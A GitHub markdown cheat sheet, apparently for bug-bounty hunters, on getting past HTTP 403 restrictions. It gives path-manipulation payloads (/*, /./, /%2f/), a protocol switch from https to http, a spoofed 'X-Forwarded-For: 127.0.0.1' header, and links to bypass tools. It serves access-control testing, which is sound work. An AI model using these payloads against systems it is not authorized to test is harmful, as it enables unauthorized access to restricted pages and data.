403 Bypass

I am sharing all this tips and techniques from my own personal experience there no official references for that

Directory Based

If you see directory with no slash at end then do these acts there

site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200

File Base

If you see file without any slash at end then do these acts there

site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200

Protocol Base

Well, sound wired but check out the example for better understanding

https://site.com/secret => 403
http://site.com/secret => 200

Payloads

/
/*
/%2f/
/./
./.
/*/

Header

https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/

X-Forwarded-For: 127.0.0.1

Tools

Here is a Tool I found on twitter.

https://github.com/yunemse48/403bypasser
https://github.com/Dheerajmadhukar/4-ZERO-3

Proof Of Concept

Well Always look for some references or proof of concept if someone sharing any tips so you may confirm you are not wasting your time at all. I have some poc video on my YouTube channel for 403 and other Improper access control bugs with those methods. You can check them

YouTube: Mehedi Hasan Remon

Author:@remonsec @KathanP19

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

403Bypass.md

403Bypass.md

403 Bypass

Directory Based

File Base

Protocol Base

Payloads

Header

Tools

Proof Of Concept

Files

403Bypass.md

Latest commit

History

403Bypass.md

File metadata and controls

403 Bypass

Directory Based

File Base

Protocol Base

Payloads

Header

Tools

Proof Of Concept